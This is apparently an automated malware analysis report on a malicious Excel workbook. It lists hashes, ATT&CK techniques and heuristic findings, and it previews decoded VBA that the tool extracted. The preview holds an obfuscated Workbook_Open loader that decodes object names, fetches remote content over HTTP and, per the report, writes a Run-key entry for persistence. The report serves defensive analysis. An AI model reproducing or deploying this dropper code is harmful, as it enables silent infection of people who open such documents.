Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d265dff9438345d1…

MALICIOUS

Office (OOXML)

22.0 KB Created: 2010-07-22 03:25:32 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2021-10-26
MD5: b4d10b14b344309ab9d08a7c2f118f2a SHA-1: 6c2dfec3f7b886367a953c13f67855962ba09666 SHA-256: d265dff9438345d1d732b1a2385faf6401105eaff4be736fdf4ebc89d46a6a91
228 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is an Office document containing a Workbook_Open macro, which is a common technique for executing malicious code upon opening. The VBA code is heavily obfuscated and uses CreateObject to instantiate objects, indicating an attempt to download and execute a secondary payload. The heuristic 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' strongly suggests this behavior. The macro also attempts to write to the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy for persistence.

Heuristics 7

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 7266 bytes
SHA-256: 2d62567e48ae022488a17feb02becadafd3282571751085375d01c4cf04a029b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Call l1l11
End Sub
Private Sub l1l11()
Call l11l
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Option Explicit
#If VBA7 Then
Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal l1l1ll As LongPtr)
#Else
Public Declare Sub Sleep Lib "kernel32" (ByVal l1l1ll As Long)
#End If
Sub l11l()
Dim l111l1, l11ll1
Set l111l1 = CreateObject(l1lll("canabsvpfq", "fI;{>IY%B:x>4,"))
Set l111l1 = CreateObject(l1lll("mftgewxkye", "jt<;4?~>G)1=Xy9j8I}AK816"))
Set l111l1 = CreateObject(l1lll("nsaysbqthb", "'zy27BHOT 6(/E"))
If l11ll(l111l1, l1ll1(l1l1(l1lll("tnitkbczkm", "/028BCTBE:C3")))) Then
MsgBox l1lll("ysdbikqnba", "/x6G/E1D>1>?TUAH0:=7.B@GA-=I>2)OX73?A34F\V%CAFR@B1)=GAC>*,&?5@/6R&H>@6(:LA@5IM):;:H)5LE/F7V2IW<A>9@6-1GK*9%;1D8)`"), vbOKOnly, l1lll("kdtlrlyqqj", "h|854=H2;EFn=0'G")
Else
MsgBox l1lll("ogvqitwyfc", "e/3N(F0U::IMN`MNF:9B0DE@W;1LJ8$TY,E89<GAPL&0DIW'M.9:N:D=;(/JC::BX<H:K8*?EWN)LY/5@;=;.DNBA+L36Z?F%D=F4*HJ;5.F?>C5f"), vbOKOnly, l1lll("ofilmzlyso", "*&-)428;2;TpH+(0")
End If
End Sub
Function l1l1(ByVal l111l1)
Dim l1l1l1, l1l111
l1l111 = Replace(l1lll("yojvdtvpbg", "flqn66\Yb>/No;4H47):L9K)@>N=3Od5>4P4(0%R4*E5%MAb%2&F=4'RZdZ;8;BYK5-0bMLM"), l1lll("kggkddkcko", "zk"), l1lll("kdtlrlyqqj", "S]"))
If (IsNull(l111l1) = False) And (IsNull(l11l1(Replace(l1l111, l1lll("swppevpbuh", "Mgh\"), l1lll("fduuhpyrjv", "ACJH")))) = False) Then
l1l1l1 = l11l1(Replace(l1l111, l1lll("uvnhkqpudg", "}`mZ"), l1lll("kdtlrlyqqj", ":8CF")))
l1l1l1 = Replace(l1l1l1, l1lll("lmteimkxkv", "^u"), l1lll("btnxhrjinh", "tK"))
l1l1l1 = Replace(l1l1l1, l1lll("xppxvduekt", "mG"), l1lll("rqgwdxdvcw", "u"""))
l1l1l1 = Replace(l1l1l1, l1lll("kggkddkcko", "-R"), l1lll("jvgxttthwi", "N|&#ihv$"))
Else
MsgBox l1lll("mqdsfnqjzw", "S 5C9<=UMGC:OYZ<D)-60YC2Y3;>F6;MX=D7O';8eC*=7HW-=9@<CK:J;;<D0;3OF:7.?8?=7YF3>U-L9:N:-Z968@C7CM>F+4HM);>W;H;@,?<BT"), vbOKOnly, l1lll("mxdijjunle", "s{-(6>A488R~Q/.:")
End If
l1l1 = l1l1l1
End Function
Function l11l1(l11ll1)
Dim l1ll11, l11l1l
Set l1ll11 = CreateObject(l1lll("ogvqitwyfc", "a%!'s \c~w##))}"))
l1ll11.Open l1lll("ljsrgubjyp", "&ll."), l11ll1, False
l1ll11.send
If l1ll11.Status = 200 Then
l11l1l = l1ll11.ResponseText
l11l1 = l11l1l
Else
MsgBox l1lll("obxnxvydti", "B14R*D)I=<<:F[O@5-218D7?M9;A=;6TP71@?(A6bK&/1DZ1S0.;R<B6/+1=025DJ+;3:@*1DML3AL2G@2H'6J:<6=K35G:I/J?;8,FC/809,6>7X"), vbOKOnly, l1lll("qmjnyrnbqi", "e"">'F<A6,9DhD.9.")
End If
End Function
Function l1ll()
Dim l1111l As Variant
Dim l11lll As Long
Dim l111l1 As String
Dim l1l111 As Integer
l1l111 = 10
l1111l = Array(l1lll("btnxhrjinh", "@4"), l1lll("jujcrmgxll", "#:"), l1lll("xhvuwojbwt", "`3"), l1lll("obrlwfgmkx", "p/"), l1lll("zaclgtrmvd", "W;"), l1lll("hdnovcumlg", "L/"), l1lll("ryayysavai", "T3"), l1lll("jrokokvmya", "[5"), l1lll("ogvqitwyfc", "*A"), l1lll("ogvqitwyfc", "bB"), _
l1lll("nsaysbqthb", "N/"), l1lll("hdfkahxtvj", "]@"), l1lll("hcjxpsxrml", "`8"), l1lll("xppxvduekt", "k3"), l1lll("vjumfxnqkc", "OB"), l1lll("kmsetfqoul", "xA"), l1lll("ljsrgubjyp", "/7"), l1lll("kmsetfqoul", "fC"), l1lll("yojvdtvpbg", "dI"), l1lll("vjumfxnqkc", "IG"), l1lll("bfyrbuuqle", "pK"), l1lll("jujcrmgxll", "oN"), l1lll("vjumfxnqkc", "lJ"), l1lll("obrlwfgmkx", "NC"), _
l1lll("lmteimkxkv", "*P"), l1lll("obrlwfgmkx", "uE"), l1lll("jrokokvmya", "M\"), l1lll("awlzqrivqs", "`["), l1lll("uqbqlfclmg", "jc"), l1lll("jukgkrspcx", "aa"), l1lll("tzhqpadaiw", "fV"), l1lll("fduuhpyrjv", "Io"), l1lll("xhvuwojbwt", "se"), l1lll("ry
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 27136 bytes
SHA-256: 43f7a7b48c6686c9152732da01e53b693b5eafadbb7bb2b64d09bf863acc2859

Open this report in the interactive analyzer, or submit your own file for analysis.